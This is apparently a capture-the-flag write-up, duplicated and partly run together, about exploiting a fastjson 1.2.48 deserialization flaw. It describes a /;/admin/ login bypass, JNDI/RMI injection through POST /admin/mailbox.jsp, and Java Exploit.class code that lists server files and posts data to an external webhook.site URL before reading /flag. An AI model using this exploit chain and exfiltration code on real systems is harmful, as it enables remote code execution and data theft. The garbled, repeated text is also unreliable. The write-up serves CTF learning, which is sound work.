Somehow, my RMI server did receive the request, but file server(to serve Exploit.class) did not.
I decided to change from RMI to JNDI, and it magically works, it did access my Exploit.class.
But the exploit code still no response, we don't know how to do and stuck for a while.
Later on, I change the Java exploit code to Thread.sleep(5) to see if the remote server executes our code or not, and the answer is surprisingly true.
So, I updated my Java exploit, to send a request to my server, like this:
import java.io.*;
import java.net.*;
import java.util.*;
public class Exploit{
public Exploit() throws Exception {
String str = "test";
URL url = new URL("https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b");
Map<String,Object> params = new LinkedHashMap<>();
params.put("msg", str);
StringBuilder postData = new StringBuilder();
for (Map.Entry<String,Object> param : params.entrySet()) {
if (postData.length() != 0) postData.append('&');
postData.append(URLEncoder.encode(param.getKey(), "UTF-8"));
postData.append('=');
postData.append(URLEncoder.encode(String.valueOf(param.getValue()), "UTF-8"));
}
byte[] postDataBytes = postData.toString().getBytes("UTF-8");
HttpURLConnection conn = (HttpURLConnection)url.openConnection();
conn.setRequestMethod("POST");
conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
conn.setRequestProperty("Content-Length", String.valueOf(postDataBytes.length));
conn.setDoOutput(true);
conn.getOutputStream().write(postDataBytes);
Reader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "UTF-8"));
}
public static void main(String[] args) throws Exception {
}
}
After received the request, I tried to list files and send it back to my server, but no response. So, I added a try catch to see what's going on:
String str = "";
try{
File f = new File("/var");
File[] paths = f.listFiles();
str = paths.toString();
for (int i = 0; i < paths.length; i++) {
str += paths[i].toString() + ",";
}
} catch(Exception e){
str = e.toString() + "," + e.getMessage();
}
It's java.lang.reflect.InvocationTargetException, and I still don't know why the server throwing this exception. Maybe the server blocks certain functions? or it's the problem with JDK version?
Anyway, I stuck for a while again, and then I decided to try to read a file, instead of listing it. To my surprise again, it works.
Here comes the end of the story, I read /flag then, luckily, I got the flag. I am a lucky guy.
We found a login bypass via
/;/admin/, after the bypass you can see the admin portal, and there is a mailbox page:You can download a
lib.zipto see what libraries they used, and this file for sure is the key:fastjson-1.2.48.jarAfter few tries we found that the endpoint
POST /admin/mailbox.jspis vulnerable. We can send a JSON data viainputtext={JSON}.By sending a simple query, you can validate that it's vulnerable because we received the DNS query:
After found the injection entry, we tried few payloads we can find on the internet, but somehow it does not work.
So I followed the instruction here: 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp to run a RMI server via:
Somehow, my RMI server did receive the request, but file server(to serve
Exploit.class) did not.I decided to change from RMI to JNDI, and it magically works, it did access my
Exploit.class.But the exploit code still no response, we don't know how to do and stuck for a while.
Later on, I change the Java exploit code to
Thread.sleep(5)to see if the remote server executes our code or not, and the answer is surprisingly true.So, I updated my Java exploit, to send a request to my server, like this:
After received the request, I tried to list files and send it back to my server, but no response. So, I added a
try catchto see what's going on:It's
java.lang.reflect.InvocationTargetException, and I still don't know why the server throwing this exception. Maybe the server blocks certain functions? or it's the problem with JDK version?Anyway, I stuck for a while again, and then I decided to try to read a file, instead of listing it. To my surprise again, it works.
Here comes the end of the story, I read
/flagthen, luckily, I got the flag. I am a lucky guy.